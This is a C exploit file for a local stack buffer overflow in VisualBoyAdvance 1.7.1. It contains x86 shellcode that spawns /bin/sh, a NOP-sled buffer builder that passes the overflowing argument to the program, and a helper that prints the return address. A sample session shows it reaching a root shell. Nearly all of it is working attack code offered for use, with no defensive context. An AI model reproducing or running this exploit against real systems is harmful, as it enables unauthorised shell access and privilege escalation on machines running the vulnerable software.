/* 
VisualBoyAdvanced 1.x.x local Shell Exploit by Qnix (q-nix[at]hotmail.com)

Example :

[root@Qnix exp]# ls V* exp*c ret*c ret exp
exp    ret.c                                            VisualBoyAdvance.cfg
exp.c  VisualBoyAdvance
ret    VisualBoyAdvance-1.7.1-SDL-linux-glibc22.tar.gz
[root@Qnix exp]# ./exp
Segmentation fault
[root@Qnix exp]# ./ret
-1073745328
[root@Qnix exp]# ./exp -1073745328
VisualBoyAdvance-SDL version 1.7.1
Linux version
Seaching for file VisualBoyAdvance.cfg
Searching current dir: /root/tools/exp
Reading configuration file.
sh-3.00# :)

exp.c
**/

char shellcode[] =
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
"\x68";

int main(int argc,char *argv[])
{
       char buffer[2300];
       int i,x;
       long *ptr = (long *) buffer;

       for(i=0 ; i < 570 ; i++)
               *(ptr + i) = atoi(argv[1]);

       for(i=0 ; i < 1900 ; i++)
               buffer[i] = '\x90';

       for(x=0 ; x < strlen(shellcode) ; x++ )
               buffer[i++] = shellcode[x];

       execl("./VisualBoyAdvance","VisualBoyAdvance",buffer,0);

       return 0;
}

/*
ret.c

#include<stdio.h>
int main(void)
{
       int i;
       printf("%d\n",0xbffff250);
       return 0;
}

 */